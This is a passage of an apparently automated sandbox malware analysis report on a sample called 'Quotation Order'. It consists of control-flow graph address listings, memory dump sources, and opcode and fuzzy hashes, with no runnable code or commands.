1196->1201 1197->1196 1198->1175 1202 7ff7c19cc647-7ff7c19cc65a 1200->1202 1201->1202 1203 7ff7c19cc5cd 1201->1203 1204 7ff7c19cc661-7ff7c19cc693 call 7ff7c19cb1f0 call 7ff7c19c74f0 1202->1204 1205 7ff7c19cc65c call 7ff7c19cb1f0 1202->1205 1206 7ff7c19cc613-7ff7c19cc637 1203->1206 1207 7ff7c19cc5cf-7ff7c19cc5e7 call 7ff7c19c7890 1203->1207 1209 7ff7c19cc799-7ff7c19cc7ca 1204->1209 1220 7ff7c19cc699-7ff7c19cc6b9 1204->1220 1205->1204 1208 7ff7c19cc63d-7ff7c19cc65c call 7ff7c19cb1f0 1206->1208 1206->1209 1208->1204 1221 7ff7c19cc814-7ff7c19cc856 call 7ff7c19cb1f0 * 2 call 7ff7c19c74f0 1209->1221 1222 7ff7c19cc7cc-7ff7c19cc7f7 1209->1222 1227 7ff7c19cc6bb-7ff7c19cc6db 1220->1227 1228 7ff7c19cc73a-7ff7c19cc74b 1220->1228 1225 7ff7c19cc98e-7ff7c19cc9e3 1221->1225 1248 7ff7c19cc85c-7ff7c19cc87a 1221->1248 1224 7ff7c19cc7fd-7ff7c19cc813 1222->1224 1222->1225 1224->1221 1243 7ff7c19ccab6-7ff7c19ccac1 1225->1243 1244 7ff7c19cc9e9-7ff7c19cca3e call 7ff7c19cb1f0 * 2 call 7ff7c19c74f0 1225->1244 1231 7ff7c19cc74c-7ff7c19cc758 1227->1231 1232 7ff7c19cc6dd-7ff7c19cc6e2 1227->1232 1228->1231 1235 7ff7c19cc75f-7ff7c19cc760 1231->1235 1236 7ff7c19cc75a call 7ff7c19cbbc0 1231->1236 1237 7ff7c19cc763-7ff7c19cc76f 1232->1237 1238 7ff7c19cc6e4-7ff7c19cc716 call 7ff7c19c7890 1232->1238 1235->1237 1236->1235 1237->1209 1242 7ff7c19cc771-7ff7c19cc798 1237->1242 1238->1209 1249 7ff7c19cc71c-7ff7c19cc75a call 7ff7c19cbbc0 1238->1249 1254 7ff7c19ccac3-7ff7c19ccac5 1243->1254 1255 7ff7c19ccac6-7ff7c19ccb0b 1243->1255 1244->1243 1277 7ff7c19cca40-7ff7c19cca6b 1244->1277 1248->1225 1252 7ff7c19cc880-7ff7c19cc89a 1248->1252 1249->1235 1258 7ff7c19cc8f3 1252->1258 1259 7ff7c19cc89c-7ff7c19cc89f 1252->1259 1254->1255 1266 7ff7c19ccb95-7ff7c19ccba7 1255->1266 1267 7ff7c19ccb11-7ff7c19ccb51 call 7ff7c19cb1f0 call 7ff7c19c74f0 1255->1267 1264 7ff7c19cc964 1258->1264 1265 7ff7c19cc8f5-7ff7c19cc8fa 1258->1265 1262 7ff7c19cc920-7ff7c19cc962 call 7ff7c19cbbc0 1259->1262 1263 7ff7c19cc8a1-7ff7c19cc8ba 1259->1263 1262->1264 1270 7ff7c19cc8d5-7ff7c19cc8e7 1263->1270 1271 7ff7c19cc8bc-7ff7c19cc8d3 1263->1271 1264->1225 1269 7ff7c19cc966-7ff7c19cc979 1264->1269 1272 7ff7c19cc97b-7ff7c19cc98d 1265->1272 1273 7ff7c19cc8fc-7ff7c19cc91b call 7ff7c19c7890 1265->1273 1285 7ff7c19ccbe9-7ff7c19ccc18 call 7ff7c19c8480 1266->1285 1286 7ff7c19ccba9-7ff7c19ccbe7 1266->1286 1267->1266 1292 7ff7c19ccb53-7ff7c19ccb94 call 7ff7c19c8910 1267->1292 1269->1272 1279 7ff7c19cc8eb-7ff7c19cc8f1 1270->1279 1271->1279 1273->1262 1283 7ff7c19cca6d-7ff7c19cca7f 1277->1283 1284 7ff7c19ccaaa-7ff7c19ccab5 1277->1284 1279->1258 1283->1243 1290 7ff7c19cca81-7ff7c19ccaa7 1283->1290 1295 7ff7c19ccc72-7ff7c19cccbd 1285->1295 1296 7ff7c19ccc1a-7ff7c19ccc5e 1285->1296 1286->1285 1290->1284 1302 7ff7c19cccbf-7ff7c19cccd8 1295->1302 1303 7ff7c19cccda-7ff7c19cccdc 1295->1303 1306 7ff7c19ccd59-7ff7c19ccd63 1296->1306 1305 7ff7c19cccdf-7ff7c19cccec 1302->1305 1303->1305 1308 7ff7c19ccd51-7ff7c19ccd56 1305->1308 1309 7ff7c19cccee-7ff7c19ccd0b 1305->1309 1311 7ff7c19ccc63-7ff7c19ccc6e 1306->1311 1312 7ff7c19ccd69-7ff7c19ccd6f 1306->1312 1310 7ff7c19ccd58 1308->1310 1309->1310 1315 7ff7c19ccd0d-7ff7c19ccd4c call 7ff7c19c9990 1309->1315 1310->1306 1311->1295 1314 7ff7c19ccd70-7ff7c19cceb7 1311->1314 1315->1308
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 580816a74ce7d71c72430b60a2c2a5583a8cf464e7be6434059e91f74d7002c9
                                                                                                                                                                                                                                                    • Instruction ID: 13dc75e88c8cde596eb9b1ab6c822a19bbc032213818478fc95c97aead3c34e7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 580816a74ce7d71c72430b60a2c2a5583a8cf464e7be6434059e91f74d7002c9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18A2383050CB894FE309EF38C4A44A5BBE1FF96315B5445BED0CAC72A2DA79E846CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19C8DB8 Relevance: .9, Instructions: 920COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b7129ef06db7d467331638d8997c78eb95b078f29fc7916f00e0d4880284fa10
                                                                                                                                                                                                                                                    • Instruction ID: c1365015638cc9b50adcccfde4558d9c3aa15e952c836a54a7405f58bda14fdf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7129ef06db7d467331638d8997c78eb95b078f29fc7916f00e0d4880284fa10
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76520730A08A598FDB68EE2CC465679B7E1FF55314F5401BDE08EC72A2DE64EC42CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19CBD30 Relevance: .4, Instructions: 430COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: cc60ac2ef1b05958e985c81e53a0735255852c4008a9bb47ce0344e741e58d56
                                                                                                                                                                                                                                                    • Instruction ID: d0e1c7424165ffed3e1b7bf2a81b1baff6dc1fd76c9633802269b8ebd0a00fc9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc60ac2ef1b05958e985c81e53a0735255852c4008a9bb47ce0344e741e58d56
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD1553060CB864FE31CDF2984A51B5B7E2FF96315B54867ED4CBC32A2DA74A442CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19D4D25 Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e51d57a2780a0a80d8844ac3970589778f1e61cd0e135ac84ccf75cfb384ebf8
                                                                                                                                                                                                                                                    • Instruction ID: b6a49ad7ada13054390f191e11f50a42a54b010b14d5a3c6bacddcfc20e6d2ed
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e51d57a2780a0a80d8844ac3970589778f1e61cd0e135ac84ccf75cfb384ebf8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA414831A0C7890FD71E9A3888661B57BA5EB83220B5582BFD187CB6A7DC18680783D1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19D4DB4 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 75e451d39e7f41f666d9eeea896a5cc367c9f2b6ed41456a7a1ae07f34c11986
                                                                                                                                                                                                                                                    • Instruction ID: e9e30049379e212c97d24752bcf4eb32abbd767ac461e8b44475cdb93b1ce401
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75e451d39e7f41f666d9eeea896a5cc367c9f2b6ed41456a7a1ae07f34c11986
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89412A3150D7C91FD71F9B3888651A57FA5EB43210B1681BFD186C7197DD285C06C7A1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19C2780 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 271libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                                    • API String ID: 1029625771-3993045852
                                                                                                                                                                                                                                                    • Opcode ID: b75020a4f75239134960606f8e3c86369df438c3560eba80bfbd4e0d1f24512b
                                                                                                                                                                                                                                                    • Instruction ID: 26f47e8a6416466033afc51703d68d1c70e060335393f5dc02adf13e7920ee5d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b75020a4f75239134960606f8e3c86369df438c3560eba80bfbd4e0d1f24512b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE81A230508A8D4FEB58EF2898557F97BD1FF59360F10417AE84EC7292CA74A881CB92
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1AA0186 Relevance: 1.9, Strings: 1, Instructions: 697COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 359 7ff7c1aa0186-7ff7c1aa018b 360 7ff7c1aa01cd-7ff7c1aa01ec 359->360 361 7ff7c1aa018d-7ff7c1aa01bc 359->361 362 7ff7c1aa0236-7ff7c1aa024e 360->362 363 7ff7c1aa01ee-7ff7c1aa0222 360->363 364 7ff7c1aa01bf-7ff7c1aa01c0 361->364 365 7ff7c1aa01be 361->365 370 7ff7c1aa024f-7ff7c1aa0258 362->370 366 7ff7c1aa03b1-7ff7c1aa03b7 363->366 367 7ff7c1aa0228-7ff7c1aa023b 363->367 368 7ff7c1aa01c1 364->368 369 7ff7c1aa0179-7ff7c1aa0185 364->369 365->364 378 7ff7c1aa03b9-7ff7c1aa03c8 366->378 367->366 371 7ff7c1aa0241-7ff7c1aa0257 367->371 368->369 372 7ff7c1aa01c3 368->372 369->359 375 7ff7c1aa025a-7ff7c1aa026d 370->375 371->375 372->360 376 7ff7c1aa0421-7ff7c1aa0427 372->376 375->366 381 7ff7c1aa0273-7ff7c1aa0278 375->381 379 7ff7c1aa0429-7ff7c1aa0440 376->379 380 7ff7c1aa045c-7ff7c1aa046e 376->380 382 7ff7c1aa03c9-7ff7c1aa0401 378->382 383 7ff7c1aa0442-7ff7c1aa0445 379->383 384 7ff7c1aa04b1-7ff7c1aa04b8 379->384 390 7ff7c1aa0471-7ff7c1aa0474 380->390 385 7ff7c1aa0279-7ff7c1aa027c 381->385 382->378 387 7ff7c1aa0403 382->387 388 7ff7c1aa04c6-7ff7c1aa04d0 383->388 389 7ff7c1aa0447-7ff7c1aa045a 383->389 384->390 391 7ff7c1aa04bb-7ff7c1aa073c 384->391 394 7ff7c1aa0284-7ff7c1aa0286 385->394 392 7ff7c1aa0661-7ff7c1aa067a 387->392 396 7ff7c1aa04d1-7ff7c1aa04d5 388->396 389->380 389->396 399 7ff7c1aa0786-7ff7c1aa078b 391->399 400 7ff7c1aa073e-7ff7c1aa0745 391->400 414 7ff7c1aa067c-7ff7c1aa067e 392->414 415 7ff7c1aa06eb 392->415 402 7ff7c1aa0288-7ff7c1aa0289 394->402 403 7ff7c1aa02f7-7ff7c1aa0309 394->403 397 7ff7c1aa04d6 396->397 398 7ff7c1aa04d7-7ff7c1aa04e7 396->398 397->398 404 7ff7c1aa04e9-7ff7c1aa0500 398->404 405 7ff7c1aa051c-7ff7c1aa052e 398->405 408 7ff7c1aa0a42-7ff7c1aa0a48 399->408 409 7ff7c1aa078c-7ff7c1aa07bd 399->409 406 7ff7c1aa0746-7ff7c1aa0772 400->406 402->370 411 7ff7c1aa028b-7ff7c1aa028d 402->411 403->366 407 7ff7c1aa030f-7ff7c1aa0348 403->407 412 7ff7c1aa0502-7ff7c1aa0505 404->412 413 7ff7c1aa0571-7ff7c1aa0578 404->413 424 7ff7c1aa0531-7ff7c1aa0534 405->424 406->408 416 7ff7c1aa0778-7ff7c1aa0785 406->416 407->378 435 7ff7c1aa034a-7ff7c1aa034d 407->435 440 7ff7c1aa0a49-7ff7c1aa0a56 408->440 409->408 418 7ff7c1aa07c3-7ff7c1aa07d6 409->418 428 7ff7c1aa028f-7ff7c1aa02a0 411->428 429 7ff7c1aa02d4 411->429 420 7ff7c1aa0586-7ff7c1aa0590 412->420 421 7ff7c1aa0507-7ff7c1aa051a 412->421 413->424 426 7ff7c1aa057b 413->426 422 7ff7c1aa0680 414->422 423 7ff7c1aa06fa-7ff7c1aa0708 414->423 415->406 416->399 443 7ff7c1aa07d8 418->443 444 7ff7c1aa0847-7ff7c1aa0859 418->444 438 7ff7c1aa0592-7ff7c1aa0596 420->438 439 7ff7c1aa0597-7ff7c1aa05c0 420->439 421->405 433 7ff7c1aa0682-7ff7c1aa06a8 422->433 434 7ff7c1aa06c6-7ff7c1aa06c7 422->434 441 7ff7c1aa06c1-7ff7c1aa06c5 423->441 442 7ff7c1aa070b 423->442 436 7ff7c1aa07d9-7ff7c1aa07dd 426->436 448 7ff7c1aa0232-7ff7c1aa0233 428->448 449 7ff7c1aa02a2-7ff7c1aa02b8 428->449 429->366 431 7ff7c1aa02da-7ff7c1aa02f5 429->431 431->403 471 7ff7c1aa06aa-7ff7c1aa06b9 433->471 472 7ff7c1aa06bc-7ff7c1aa06bf 433->472 435->382 451 7ff7c1aa034f 435->451 463 7ff7c1aa07df-7ff7c1aa0808 436->463 464 7ff7c1aa0824 436->464 438->439 454 7ff7c1aa05c2-7ff7c1aa05c5 439->454 455 7ff7c1aa0631-7ff7c1aa0638 439->455 447 7ff7c1aa0a57-7ff7c1aa0a90 440->447 441->434 442->406 452 7ff7c1aa0969-7ff7c1aa0971 442->452 443->436 444->408 456 7ff7c1aa085f-7ff7c1aa0872 444->456 447->440 462 7ff7c1aa0a93-7ff7c1aa0cfe 447->462 448->362 449->366 453 7ff7c1aa02be-7ff7c1aa02d1 449->453 458 7ff7c1aa0351-7ff7c1aa035f 451->458 459 7ff7c1aa0396-7ff7c1aa03b0 451->459 460 7ff7c1aa0974-7ff7c1aa097a 452->460 453->429 466 7ff7c1aa0646-7ff7c1aa0660 454->466 467 7ff7c1aa05c7-7ff7c1aa05ee 454->467 468 7ff7c1aa05f1-7ff7c1aa05f4 455->468 469 7ff7c1aa063b 455->469 486 7ff7c1aa0874-7ff7c1aa0877 456->486 487 7ff7c1aa08e3-7ff7c1aa08f0 456->487 474 7ff7c1aa097d-7ff7c1aa0990 460->474 463->408 490 7ff7c1aa080e-7ff7c1aa0821 463->490 464->408 477 7ff7c1aa082a-7ff7c1aa0845 464->477 466->392 467->468 479 7ff7c1aa0899-7ff7c1aa08a2 469->479 471->472 472->441 475 7ff7c1aa0993 474->475 475->408 482 7ff7c1aa0999-7ff7c1aa09b5 475->482 477->444 479->408 488 7ff7c1aa08a8-7ff7c1aa08be 479->488 503 7ff7c1aa09d2-7ff7c1aa09e6 482->503 504 7ff7c1aa09b7-7ff7c1aa09cc 482->504 492 7ff7c1aa08f3 486->492 493 7ff7c1aa0879 486->493 487->492 488->408 489 7ff7c1aa08c4-7ff7c1aa08f0 488->489 489->492 490->464 492->408 494 7ff7c1aa08f9-7ff7c1aa090c 492->494 496 7ff7c1aa08c0 493->496 497 7ff7c1aa087b-7ff7c1aa0898 493->497 494->474 505 7ff7c1aa090e-7ff7c1aa0912 494->505 499 7ff7c1aa08c2 496->499 500 7ff7c1aa08c3-7ff7c1aa08e1 496->500 497->479 499->500 500->487 503->447 506 7ff7c1aa09e8-7ff7c1aa09ed 503->506 504->503 505->475 507 7ff7c1aa0914 505->507 506->460 509 7ff7c1aa09ef 506->509 509->408
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1294309321.00007FF7C1AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1AA0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c1aa0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                                                                                    • API String ID: 0-3554254475
                                                                                                                                                                                                                                                    • Opcode ID: d8f35d3deafac2d15c4b066f10692674fba732157be3b102a744535e14785486
                                                                                                                                                                                                                                                    • Instruction ID: 8b168550aa7b3b793a3c986f2fd4cd8b5084f2e27d11513c9e3c474f681e0ccd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8f35d3deafac2d15c4b066f10692674fba732157be3b102a744535e14785486
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2323B3580CA898FD755EF28C855AB8BBA0FF55310F5406BBD08ECB192DA74E846CBD1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1AA0002 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 610 7ff7c1aa0002-7ff7c1aa001b 611 7ff7c1aa0279-7ff7c1aa027c 610->611 612 7ff7c1aa0284-7ff7c1aa0286 611->612 613 7ff7c1aa0288-7ff7c1aa0289 612->613 614 7ff7c1aa02f7-7ff7c1aa0309 612->614 617 7ff7c1aa024f-7ff7c1aa026d 613->617 618 7ff7c1aa028b-7ff7c1aa028d 613->618 615 7ff7c1aa030f-7ff7c1aa0348 614->615 616 7ff7c1aa03b1-7ff7c1aa03b7 614->616 627 7ff7c1aa03b9-7ff7c1aa03c8 615->627 629 7ff7c1aa034a-7ff7c1aa034d 615->629 616->627 617->616 633 7ff7c1aa0273-7ff7c1aa0278 617->633 623 7ff7c1aa028f-7ff7c1aa02a0 618->623 624 7ff7c1aa02d4 618->624 630 7ff7c1aa0232-7ff7c1aa024e 623->630 631 7ff7c1aa02a2-7ff7c1aa02b8 623->631 624->616 628 7ff7c1aa02da-7ff7c1aa02f5 624->628 632 7ff7c1aa03c9-7ff7c1aa0401 627->632 628->614 629->632 634 7ff7c1aa034f 629->634 630->617 631->616 635 7ff7c1aa02be-7ff7c1aa02d1 631->635 632->627 636 7ff7c1aa0403-7ff7c1aa067a 632->636 633->611 637 7ff7c1aa0351-7ff7c1aa035f 634->637 638 7ff7c1aa0396-7ff7c1aa03b0 634->638 635->624 645 7ff7c1aa067c-7ff7c1aa067e 636->645 646 7ff7c1aa06eb 636->646 647 7ff7c1aa0680 645->647 648 7ff7c1aa06fa-7ff7c1aa0708 645->648 649 7ff7c1aa0746-7ff7c1aa0772 646->649 652 7ff7c1aa0682-7ff7c1aa06a8 647->652 653 7ff7c1aa06c6-7ff7c1aa06c7 647->653 654 7ff7c1aa06c1-7ff7c1aa06c5 648->654 655 7ff7c1aa070b 648->655 650 7ff7c1aa0a42-7ff7c1aa0a48 649->650 651 7ff7c1aa0778-7ff7c1aa078b 649->651 666 7ff7c1aa0a49-7ff7c1aa0a56 650->666 651->650 659 7ff7c1aa078c-7ff7c1aa07bd 651->659 664 7ff7c1aa06aa-7ff7c1aa06b9 652->664 665 7ff7c1aa06bc-7ff7c1aa06bf 652->665 654->653 655->649 658 7ff7c1aa0969-7ff7c1aa0971 655->658 662 7ff7c1aa0974-7ff7c1aa097a 658->662 659->650 663 7ff7c1aa07c3-7ff7c1aa07d6 659->663 667 7ff7c1aa097d-7ff7c1aa0990 662->667 675 7ff7c1aa07d8-7ff7c1aa07dd 663->675 676 7ff7c1aa0847-7ff7c1aa0859 663->676 664->665 665->654 670 7ff7c1aa0a57-7ff7c1aa0a90 666->670 668 7ff7c1aa0993 667->668 668->650 671 7ff7c1aa0999-7ff7c1aa09b5 668->671 670->666 673 7ff7c1aa0a93-7ff7c1aa0cfe 670->673 683 7ff7c1aa09d2-7ff7c1aa09e6 671->683 684 7ff7c1aa09b7-7ff7c1aa09cc 671->684 687 7ff7c1aa07df-7ff7c1aa0808 675->687 688 7ff7c1aa0824 675->688 676->650 678 7ff7c1aa085f-7ff7c1aa0872 676->678 690 7ff7c1aa0874-7ff7c1aa0877 678->690 691 7ff7c1aa08e3-7ff7c1aa08f0 678->691 683->670 689 7ff7c1aa09e8-7ff7c1aa09ed 683->689 684->683 687->650 703 7ff7c1aa080e-7ff7c1aa0821 687->703 688->650 693 7ff7c1aa082a-7ff7c1aa0845 688->693 689->662 700 7ff7c1aa09ef 689->700 696 7ff7c1aa08f3 690->696 697 7ff7c1aa0879 690->697 691->696 693->676 696->650 699 7ff7c1aa08f9-7ff7c1aa090c 696->699 701 7ff7c1aa08c0 697->701 702 7ff7c1aa087b-7ff7c1aa08a2 697->702 699->667 709 7ff7c1aa090e-7ff7c1aa0912 699->709 700->650 704 7ff7c1aa08c2 701->704 705 7ff7c1aa08c3-7ff7c1aa08e1 701->705 702->650 710 7ff7c1aa08a8-7ff7c1aa08be 702->710 703->688 704->705 705->691 709->668 712 7ff7c1aa0914 709->712 710->650 711 7ff7c1aa08c4-7ff7c1aa08f0 710->711 711->696
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1294309321.00007FF7C1AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1AA0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c1aa0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                                                                                    • API String ID: 0-3554254475
                                                                                                                                                                                                                                                    • Opcode ID: 70a7e1734fe359cab35f6f203c56892ce90dd952a30250da16edcbf1373fd7f2
                                                                                                                                                                                                                                                    • Instruction ID: 14f8722be5aebdbce45b3eb533008dc284f655bf5efc121c33df1a1920ca7170
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70a7e1734fe359cab35f6f203c56892ce90dd952a30250da16edcbf1373fd7f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80122A3180CA898FDB56EF18C854AB9BBA0FF55314F5402BAD04ECB197CA74E846CBD1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19C0F05 Relevance: 1.7, APIs: 1, Instructions: 193libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 713 7ff7c19c0f05-7ff7c19c28ac 717 7ff7c19c291f-7ff7c19c2982 LoadLibraryA 713->717 718 7ff7c19c28ae-7ff7c19c28d5 713->718 722 7ff7c19c2984 717->722 723 7ff7c19c298a-7ff7c19c29be call 7ff7c19c29da 717->723 718->717 721 7ff7c19c28d7-7ff7c19c28da 718->721 725 7ff7c19c2914-7ff7c19c291c 721->725 726 7ff7c19c28dc-7ff7c19c28ef 721->726 722->723 730 7ff7c19c29c0 723->730 731 7ff7c19c29c5-7ff7c19c29d9 723->731 725->717 728 7ff7c19c28f1 726->728 729 7ff7c19c28f3-7ff7c19c2906 726->729 728->729 729->729 732 7ff7c19c2908-7ff7c19c2910 729->732 730->731 732->725
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                                                    • Opcode ID: 3f70f36904818fe9f86d6229d0a6eda63349fb2de35941c5b78347b0a12ce3ab
                                                                                                                                                                                                                                                    • Instruction ID: 7745d3d80cc4422ad178a69eb5259c6c165ba40875f164b8ff82e0611cf0d70a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f70f36904818fe9f86d6229d0a6eda63349fb2de35941c5b78347b0a12ce3ab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66518130508A8D8FEB98EF18C8557E977E1FB59350F10413EE84EC7292DA74E981CB92
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19C2D84 Relevance: 1.6, APIs: 1, Instructions: 129memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
